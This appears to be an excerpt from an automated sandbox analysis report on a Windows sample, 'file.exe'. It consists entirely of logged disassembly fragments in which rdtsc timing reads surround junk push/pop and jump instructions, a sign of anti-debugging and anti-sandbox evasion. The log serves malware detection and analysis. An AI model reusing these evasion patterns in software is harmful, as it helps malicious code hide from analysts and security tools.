                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5D88 second address: 7F5DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, 7C1DFE16h 0x0000000e lea eax, dword ptr [ebp+1247A7ACh] 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F51CCC6C588h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e mov edi, dword ptr [ebp+122D1CE0h] 0x00000034 push eax 0x00000035 jbe 00007F51CCC6C590h 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e pop eax 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83BFBA second address: 83BFEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CD041E09h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F51CD041E03h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83BFEC second address: 83C005 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CCC6C595h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C005 second address: 83C06A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F51CD041E09h 0x0000000e jmp 00007F51CD041E09h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F51CD041DFFh 0x0000001a jmp 00007F51CD041E09h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C476 second address: 83C488 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CCC6C58Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C488 second address: 83C4A1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F51CD041E02h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C4A1 second address: 83C4BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F51CCC6C58Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C4BC second address: 83C4C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C612 second address: 83C631 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CCC6C597h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C631 second address: 83C637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C637 second address: 83C63D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C63D second address: 83C677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F51CD041E08h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F51CD041E07h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C677 second address: 83C67D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C67D second address: 83C687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C687 second address: 83C68F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C68F second address: 83C69B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F51CD041DF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C69B second address: 83C69F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83EC2D second address: 83EC31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83EC31 second address: 83EC35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83EC35 second address: 83EC49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F51CD041DFEh 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jnl 00007F51CD041DF6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83EC49 second address: 83EC60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CCC6C592h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83EC60 second address: 83EC66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84206A second address: 842098 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CCC6C596h 0x00000007 push ebx 0x00000008 jng 00007F51CCC6C586h 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jbe 00007F51CCC6C588h 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 842098 second address: 84209E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84209E second address: 8420A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 841C27 second address: 841C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 841C2D second address: 841C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 841C31 second address: 841C37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 841C37 second address: 841C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 841D8A second address: 841D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F51CD041DF6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 841D99 second address: 841D9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 841D9D second address: 841DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F51CD041DF6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845774 second address: 845778 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845778 second address: 84579B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F51CD041E04h 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84579B second address: 84579F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84579F second address: 8457A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8457A5 second address: 8457AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8457AA second address: 8457B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8458F5 second address: 845908 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F51CCC6C58Eh 0x00000008 je 00007F51CCC6C586h 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845908 second address: 84590E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 849FB0 second address: 849FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F51CCC6C586h 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A134 second address: 84A14F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F51CD041E03h 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A14F second address: 84A172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F51CCC6C597h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A2BF second address: 84A2CF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F51CD041DF8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A400 second address: 84A408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A408 second address: 84A40D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A40D second address: 84A429 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F51CCC6C598h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A429 second address: 84A43B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F51CD041DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F51CD041DFCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A43B second address: 84A463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F51CCC6C598h 0x0000000d jc 00007F51CCC6C598h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A463 second address: 84A473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F51CD041DFCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A473 second address: 84A4A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F51CCC6C596h 0x00000009 jmp 00007F51CCC6C593h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A4A0 second address: 84A4A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A4A4 second address: 84A4B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F51CCC6C586h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A4B2 second address: 84A4B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2BFC second address: 7B2C00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2C00 second address: 7B2C0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2C0A second address: 7B2C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F51CCC6C586h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F60A second address: 84F640 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CD041E06h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007F51CD041E06h 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F640 second address: 84F65C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F51CCC6C598h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F65C second address: 84F660 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84FA91 second address: 84FA99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 857017 second address: 85701D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85731D second address: 85733F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F51CCC6C58Ch 0x0000000f jmp 00007F51CCC6C58Ch 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85733F second address: 857383 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CD041E07h 0x00000007 jmp 00007F51CD041E09h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jo 00007F51CD041E08h 0x00000016 push eax 0x00000017 push edx 0x00000018 jc 00007F51CD041DF6h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 857383 second address: 857387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 857C26 second address: 857C34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F51CD041DFEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 857C34 second address: 857C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 jnp 00007F51CCC6C586h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F51CCC6C58Ah 0x00000019 jp 00007F51CCC6C586h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 857C58 second address: 857C5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 857C5C second address: 857C65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 857C65 second address: 857C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 857C6D second address: 857C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 857C76 second address: 857C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8589FA second address: 858A13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F51CCC6C593h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 858A13 second address: 858A17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85CBD9 second address: 85CBEB instructions: 0x00000000 rdtsc 0x00000002 js 00007F51CCC6C588h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F51CCC6C586h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BD40 second address: 85BD46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C8BA second address: 85C8BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C8BF second address: 85C8C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 869703 second address: 86970D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F51CCC6C586h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86970D second address: 869758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b ja 00007F51CD041DF6h 0x00000011 jmp 00007F51CD041E03h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F51CD041E04h 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 je 00007F51CD041DF6h 0x00000027 jc 00007F51CD041DF6h 0x0000002d popad 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8678DF second address: 8678E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8678E3 second address: 8678ED instructions: 0x00000000 rdtsc 0x00000002 jg 00007F51CD041DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8678ED second address: 8678F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jnc 00007F51CCC6C586h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 867C57 second address: 867C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 867DCB second address: 867DCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 867DCF second address: 867DDA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 867DDA second address: 867DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868203 second address: 868208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868208 second address: 868235 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F51CCC6C592h 0x0000000a popad 0x0000000b jng 00007F51CCC6C588h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jl 00007F51CCC6C586h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868235 second address: 86823B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86823B second address: 86824A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F51CCC6C58Ah 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86958A second address: 86958E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86958E second address: 86959B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 867321 second address: 867355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F51CD041E00h 0x0000000a jmp 00007F51CD041E07h 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007F51CD041DF6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 867355 second address: 86735F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F51CCC6C586h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 870631 second address: 870656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F51CD041DFBh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F51CD041DFCh 0x00000010 jnc 00007F51CD041DF6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 870656 second address: 870661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872DF5 second address: 872DFA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 878D4A second address: 878D79 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F51CCC6C58Ch 0x0000000d jmp 00007F51CCC6C595h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 878D79 second address: 878D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
